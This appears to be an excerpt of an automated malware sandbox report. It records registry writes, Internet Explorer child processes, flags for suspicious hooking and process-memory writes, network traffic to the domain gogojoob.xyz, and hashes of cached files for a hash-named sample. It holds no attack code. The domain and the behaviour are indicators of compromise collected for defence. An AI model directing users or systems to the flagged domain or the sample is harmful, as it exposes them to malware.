| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000e764cedf717099b62b243e3f0b0d71fec32127e0e67c27a01e4187e8aed24731000000000e8000000002000020000000e4245d103e71e70630884964ef2550592768c5cc24e03cd15cf3c4c9facd2037200000000279a15ee9174cfc4dc95cfa8d2057992b22d2b0c7b3841f87b6bfe769a7e0a640000000ba290669b244e3b5f3435007e1f0b218c8b5d54634e03ef9433c512f29afa4badafe8d7688173bccff0032a3f58407dbd8ee87b4887e16862f327ee5b59a8951 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947675" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1BA970A1-A54F-11EC-B9E2-D64E15259B99} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947675" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3982930785" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947675" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3983400501" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000001fa0dd0a0786415098b5150a248926105d08378ce498a9056398d69c52851ac1000000000e80000000020000200000007b74632292aeff61003001a7aaa192ae112be7670df6c1c947db0a978b8303832000000006f7c7d36a4477a29eccd8ffc78b176f3b187183cc6714aa59acf7176cb9aec540000000a10e4a6dc99a2c035e1c889d7c2fe66a4a766665ff1c5e1b9451487401fc84849ebf406d4848291801c38f5626eaea5c98fdae42fb81f1b5b08dda29310592fa | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe
"C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82958 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.20:443 | | tcp |
| US | 52.109.8.20:443 | | tcp |
| US | 8.8.8.8:53 | api.msn.com | udp |
| US | 131.253.33.203:443 | api.msn.com | tcp |
| NL | 104.80.225.205:443 | | tcp |
| BE | 67.27.153.254:80 | | tcp |
| BE | 67.27.153.254:80 | | tcp |
| BE | 67.27.153.254:80 | | tcp |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
Files
memory/592-134-0x000000000070D000-0x0000000000718000-memory.dmp
memory/592-135-0x000000000070D000-0x0000000000718000-memory.dmp
memory/592-136-0x0000000000690000-0x000000000069C000-memory.dmp
memory/592-137-0x0000000001000000-0x000000000106F000-memory.dmp
memory/592-138-0x00000000006A0000-0x00000000006B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GGB3KH7Z\favicon[2].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat
| MD5 | ab047b08b57a2ddd7ffa030c4774ce2a |
| SHA1 | bc7416fb5d00876b4bd4e298db2cae210d4b31a6 |
| SHA256 | a4f6c5fda079c2c4751e651317bd8d10b65698a44a2c56762cc410727766b54e |
| SHA512 | d3b5a5c91cb9018f599b0f9c37727c1e8ef84e259db2794afce428fae97ef12b7245f0b31e347ce6bfa7b501f6dc4431d889c7b14a4a382ac12f0d24f99a765f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | d6fe2a0237d4c683ec6f37b14fd480bc |
| SHA1 | 382b9c8b492e71be21167dfdab9354c69d55b528 |
| SHA256 | a74c1064bd38f2a09aeb34f69c8cf54f71442e306997684f4e943fd08dbc131a |
| SHA512 | 70bfaad48ac87c792c43e0c24cf655e374663e282e50fd1cdd0f4a59d0984aad01287f97d6bc6b791234b79882049d09f4a61f2d5b96fc4f24e3a067afe23612 |